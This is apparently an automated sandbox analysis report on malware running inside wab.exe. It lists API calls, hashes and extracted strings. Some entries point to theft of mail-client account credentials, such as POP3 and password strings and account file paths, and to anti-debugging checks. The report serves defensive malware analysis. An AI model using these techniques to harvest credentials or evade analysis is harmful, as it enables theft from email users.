                  • Instruction ID: dd594d117e4b0c42c8b82bda3d39c6aca18de47488474529c48165bab08180ed
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: EE21F76154C281EFFB128B74CC04AAF6FD89B17264F1906A6D940CB163D5A885CDC3A6

                  Control-flow Graph

                  APIs
                  • GetProcAddress.KERNEL32(00000000,240CC7F4), ref: 240CC804
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC816
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,240CC7F4,240CC7DD), ref: 240CC82A
                  • GetModuleHandleA.KERNEL32(?,240CC7DD), ref: 240CC838
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 240CC860
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressProcProtectVirtual$HandleModule
                  • String ID:
                  • API String ID: 2152742572-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 88b4b929910665b2f191ea189eced2dfab965d40939996684909bb5f2034e0ef
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 72F0C25164D240FCFA1145B4DC41EBF5FCC8B27660B101A66EE00C71A3D8A5858E83F6
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 240C61DA
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 240C61E4
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 240C61F1
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 72df13f8864ad440076ecc9c6c86c04e4bf215d6a64a2a217022a3e875172de4
                  • Instruction ID: 5992570c866db5546f8d0b81b3b7fcb45acef64f5faf3de7fa1926251e857897
                  • Opcode Fuzzy Hash: 72df13f8864ad440076ecc9c6c86c04e4bf215d6a64a2a217022a3e875172de4
                  • Instruction Fuzzy Hash: 3431D37490121CDBCB21DF68D988B8DBBB8EF08710F5041EAE81CA7250EB349BC58F45
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082,240D2108,0000000C,240C1F3A,?), ref: 240C4AD5
                  • TerminateProcess.KERNEL32(00000000,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082,240D2108,0000000C,240C1F3A,?), ref: 240C4ADC
                  • ExitProcess.KERNEL32 ref: 240C4AEE
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 3c9e36ecfa40987c474afa6a4e6037d6bbf37bd15c4fa8b1deb69acc0e7531d7
                  • Instruction ID: 213eb064ec777a82ca693da7e82be23842a21f4bd54140b2bd6cc4d2e0ed0f49
                  • Opcode Fuzzy Hash: 3c9e36ecfa40987c474afa6a4e6037d6bbf37bd15c4fa8b1deb69acc0e7531d7
                  • Instruction Fuzzy Hash: 46E0B636000208EFDF026F68DD08B4D3F69FF40745B604424FA09AB121DB39D9E3DA54
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 6ff3b42c58ea74413d6a54739d3e8595ca2de97c4fc5c176d2a575a8cc6a4101
                  • Instruction ID: 1a86e1a7b8638bdd0994cafeb54b0df600d1550892deb54d1945900d9d88a5c6
                  • Opcode Fuzzy Hash: 6ff3b42c58ea74413d6a54739d3e8595ca2de97c4fc5c176d2a575a8cc6a4101
                  • Instruction Fuzzy Hash: C4312871900109EFDB249EB8CC84EEE7BBDDF85708F1006BCE919D7295E6309A858B50
                  APIs
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 232cceaa838faa81f8f352c8785f53a2613dae26b7e2b78ad2dcacd79557dbd0
                  • Instruction ID: 6bdabfcfa465048c56dc09c40f0559d7727e9d93cce011b89b97e9bd3af3eeb1
                  • Opcode Fuzzy Hash: 232cceaa838faa81f8f352c8785f53a2613dae26b7e2b78ad2dcacd79557dbd0
                  • Instruction Fuzzy Hash: 16A01130200202CF83288F38C20A30C3AACEA002803200038B808E0000EB388080AA08
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: CriticalEnterSection
                  • String ID:
                  • API String ID: 1904992153-0
                  • Opcode ID: 55b46a0442e6038887fc306863e2be4c45cd223fb4e41b9bf9fec577ad4e2ed3
                  • Instruction ID: 37f004176b3f161e93d7c69c91c09272ce3309d8369ad5e821c9e1b80da439ec
                  • Opcode Fuzzy Hash: 55b46a0442e6038887fc306863e2be4c45cd223fb4e41b9bf9fec577ad4e2ed3
                  • Instruction Fuzzy Hash: EE217533C00219DBDB00CF68C480BADB7F1AF6576AF204259E52477294C73999C69B5D

                  Control-flow Graph

                  APIs
                    • Part of subcall function 240C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D1B
                    • Part of subcall function 240C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 240C1D37
                    • Part of subcall function 240C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D4B
                  • _strlen.LIBCMT ref: 240C1855
                  • _strlen.LIBCMT ref: 240C1869
                  • _strlen.LIBCMT ref: 240C188B
                  • _strlen.LIBCMT ref: 240C18AE
                  • _strlen.LIBCMT ref: 240C18C8
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen$File$CopyCreateDelete
                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                  • API String ID: 3296212668-3023110444
                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction ID: 6fcbc69bbc4904bcb72d543c216f25a346dc9e34e815e19785b25df3e8f09eb2
                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction Fuzzy Hash: 9E61E671D04218EBEF128BA4C840BDEBBF9EF25208F10456AD204AF298DB745EC5CF56

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: %m$~$Gon~$~F@7$~dra
                  • API String ID: 4218353326-230879103
                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction ID: 6b78d65264031e5aa422024bafef65dbd00e612b7101072c85a004d89f9aa68f
                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction Fuzzy Hash: 34710971D002289BDF129BB4D894AEF7BFCAF19604F1440AAE544DB245EA74DBC5CFA0

                  Control-flow Graph

                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 240C7D06
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90D7
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90E9
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90FB
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C910D
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C911F
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9131
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9143
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9155
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9167
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9179
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C918B
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C919D
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C91AF
                  • _free.LIBCMT ref: 240C7CFB
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C7D1D
                  • _free.LIBCMT ref: 240C7D32
                  • _free.LIBCMT ref: 240C7D3D
                  • _free.LIBCMT ref: 240C7D5F
                  • _free.LIBCMT ref: 240C7D72
                  • _free.LIBCMT ref: 240C7D80
                  • _free.LIBCMT ref: 240C7D8B
                  • _free.LIBCMT ref: 240C7DC3
                  • _free.LIBCMT ref: 240C7DCA
                  • _free.LIBCMT ref: 240C7DE7
                  • _free.LIBCMT ref: 240C7DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: e8fc94c68f399ebce0de0458f152ed227e403c5c8fb819f2123eb56fca242cee
                  • Instruction ID: 46472171d6200dc484a32e7652a2eb74da53d6cffcb5b579cd7447a55e4040ff
                  • Opcode Fuzzy Hash: e8fc94c68f399ebce0de0458f152ed227e403c5c8fb819f2123eb56fca242cee
                  • Instruction Fuzzy Hash: FD314B31600A06DFEB219A38E940F6FBBFAEF00254F10456AE959D7155DE31B9C0CB24

                  Control-flow Graph

                  APIs
                  • _free.LIBCMT ref: 240C59EA
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C59F6
                  • _free.LIBCMT ref: 240C5A01
                  • _free.LIBCMT ref: 240C5A0C
                  • _free.LIBCMT ref: 240C5A17
                  • _free.LIBCMT ref: 240C5A22
                  • _free.LIBCMT ref: 240C5A2D
                  • _free.LIBCMT ref: 240C5A38
                  • _free.LIBCMT ref: 240C5A43
                  • _free.LIBCMT ref: 240C5A51
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: f8cf29e5eb40fa3938336037387164c7ee7708a699e3fdb4039cffd8942810c0
                  • Instruction ID: 4cebbcf40288f1f865f0d60e2b1bdfc5dfab19890faa234b1e2cdc50cd346399
                  • Opcode Fuzzy Hash: f8cf29e5eb40fa3938336037387164c7ee7708a699e3fdb4039cffd8942810c0
                  • Instruction Fuzzy Hash: BB11A47E560558EFDB11DF94D841CDE3FA5EF14254B0542A1BE088B229DA31DAD09B84

                  Control-flow Graph

                  APIs
                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D1B
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 240C1D37
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D4B
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D58
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D72
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D7D
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D8A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                  • String ID:
                  • API String ID: 1454806937-0
                  • Opcode ID: 09b8761fd06370feb212a11fa6aab1d2912aca27df71cdd43af5ca9dab20fb7c
                  • Instruction ID: 19bb9dc82f409a3fdf3a17e7789753d729f50bce1f8ba781141468d3189d1c35
                  • Opcode Fuzzy Hash: 09b8761fd06370feb212a11fa6aab1d2912aca27df71cdd43af5ca9dab20fb7c
                  • Instruction Fuzzy Hash: 8F2116B194121CEFEB119FA4DC8CFEEB6ACEF18354F1009A5F611E6140DA749EC68A70

                  Control-flow Graph

                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,240C9C07,?,00000000,?,00000000,00000000), ref: 240C94D4
                  • __fassign.LIBCMT ref: 240C954F
                  • __fassign.LIBCMT ref: 240C956A
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 240C9590
                  • WriteFile.KERNEL32(?,?,00000000,240C9C07,00000000,?,?,?,?,?,?,?,?,?,240C9C07,?), ref: 240C95AF
                  • WriteFile.KERNEL32(?,?,00000001,240C9C07,00000000,?,?,?,?,?,?,?,?,?,240C9C07,?), ref: 240C95E8
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0

                  Control-flow Graph
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 240C339B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 240C33A3
                  • _ValidateLocalCookies.LIBCMT ref: 240C3431
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 240C345C
                  • _ValidateLocalCookies.LIBCMT ref: 240C34B1
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 1170836740-1018135373

                  Control-flow Graph

                  APIs
                    • Part of subcall function 240C9221: _free.LIBCMT ref: 240C924A
                  • _free.LIBCMT ref: 240C92AB
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C92B6
                  • _free.LIBCMT ref: 240C92C1
                  • _free.LIBCMT ref: 240C9315
                  • _free.LIBCMT ref: 240C9320
                  • _free.LIBCMT ref: 240C932B
                  • _free.LIBCMT ref: 240C9336
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0

                  Control-flow Graph
                  APIs
                  • _free.LIBCMT ref: 240C536F
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C5381
                  • _free.LIBCMT ref: 240C5394
                  • _free.LIBCMT ref: 240C53A5
                  • _free.LIBCMT ref: 240C53B6
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID: `=&$
                  • API String ID: 776569668-3373021481
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,240C6FFD,00000000,?,?,?,240C8A72,?,?,00000100), ref: 240C887B
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,240C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 240C8901
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 240C89FB
                  • __freea.LIBCMT ref: 240C8A08
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  • __freea.LIBCMT ref: 240C8A11
                  • __freea.LIBCMT ref: 240C8A36
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  APIs
                  • _strlen.LIBCMT ref: 240C1607
                  • _strcat.LIBCMT ref: 240C161D
                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,240C190E,?,?,00000000,?,00000000), ref: 240C1643
                  • lstrcatW.KERNEL32(?,?), ref: 240C165A
                  • lstrlenW.KERNEL32(?,?,?,?,?,240C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 240C1661
                  • lstrcatW.KERNEL32(00001008,?), ref: 240C1686
                  Similarity
                  • API ID: lstrcatlstrlen$_strcat_strlen
                  • String ID:
                  • API String ID: 1922816806-0
                  APIs
                  • lstrcatW.KERNEL32(?,?), ref: 240C1038
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 240C104B
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 240C1061
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 240C1075
                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 240C1090
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 240C10B8
                  Similarity
                  • API ID: lstrlen$AttributesFilelstrcat
                  • String ID:
                  • API String ID: 3594823470-0
                  APIs
                  • GetLastError.KERNEL32(?,?,240C3518,240C23F1,240C1F17), ref: 240C3864
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 240C3872
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 240C388B
                  • SetLastError.KERNEL32(00000000,?,240C3518,240C23F1,240C1F17), ref: 240C38DD
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  APIs
                  • GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                  • _free.LIBCMT ref: 240C5B2D
                  • _free.LIBCMT ref: 240C5B55
                  • SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B62
                  • SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                  • _abort.LIBCMT ref: 240C5B74
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  APIs
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,?,?,?,240C10DF,?,?,?,00000000), ref: 240C1E9A
                    • Part of subcall function 240C1E89: lstrcatW.KERNEL32(?,?), ref: 240C1EAC
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EB3
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EC8
                    • Part of subcall function 240C1E89: lstrcatW.KERNEL32(?,240C10DF), ref: 240C1ED3
                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 240C122A
                    • Part of subcall function 240C173A: _strlen.LIBCMT ref: 240C1855
                    • Part of subcall function 240C173A: _strlen.LIBCMT ref: 240C1869
                  Similarity
                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                  • API String ID: 4036392271-1520055953
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,240C4AEA,?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000), ref: 240C4B59
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 240C4B6C
                  • FreeLibrary.KERNEL32(00000000,?,?,?,240C4AEA,?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082), ref: 240C4B8F
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 240C715C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 240C717F
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 240C71A5
                  • _free.LIBCMT ref: 240C71B8
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 240C71C7
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000000,240C636D,240C5713,00000000,?,240C2249,?,?,240C1D66,00000000,?,?,00000000), ref: 240C5B7F
                  • _free.LIBCMT ref: 240C5BB4
                  • _free.LIBCMT ref: 240C5BDB
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C5BE8
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C5BF1
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,240C10DF,?,?,?,00000000), ref: 240C1E9A
                  • lstrcatW.KERNEL32(?,?), ref: 240C1EAC
                  • lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EB3
                  • lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EC8
                  • lstrcatW.KERNEL32(?,240C10DF), ref: 240C1ED3
                  Similarity
                  • API ID: lstrlen$lstrcat
                  • String ID:
                  • API String ID: 493641738-0
                  APIs
                  • _free.LIBCMT ref: 240C91D0
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C91E2
                  • _free.LIBCMT ref: 240C91F4
                  • _free.LIBCMT ref: 240C9206
                  • _free.LIBCMT ref: 240C9218
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 240C4C1D
                  • _free.LIBCMT ref: 240C4CE8
                  • _free.LIBCMT ref: 240C4CF2
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Program Files (x86)\windows mail\wab.exe
                  • API String ID: 2506810119-3377118234
                  APIs
                    • Part of subcall function 240C5AF6: GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                    • Part of subcall function 240C5AF6: _free.LIBCMT ref: 240C5B2D
                    • Part of subcall function 240C5AF6: SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                    • Part of subcall function 240C5AF6: _abort.LIBCMT ref: 240C5B74
                    • Part of subcall function 240C6D7E: _abort.LIBCMT ref: 240C6DB0
                    • Part of subcall function 240C6D7E: _free.LIBCMT ref: 240C6DE4
                    • Part of subcall function 240C69F3: GetOEMCP.KERNEL32(00000000,?,?,240C6C7C,?), ref: 240C6A1E
                  • _free.LIBCMT ref: 240C6CD7
                  • _free.LIBCMT ref: 240C6D0D
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID: `=&$$`=&$C
                  • API String ID: 2991157371-3427526162
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,240C6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 240C8731
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 240C87BA
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 240C87CC
                  • __freea.LIBCMT ref: 240C87D5
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,240C1D66,00000000,00000000,?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue), ref: 240C5D13
                  • GetLastError.KERNEL32(?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue,240CE190,FlsSetValue,00000000,00000364,?,240C5BC8), ref: 240C5D1F
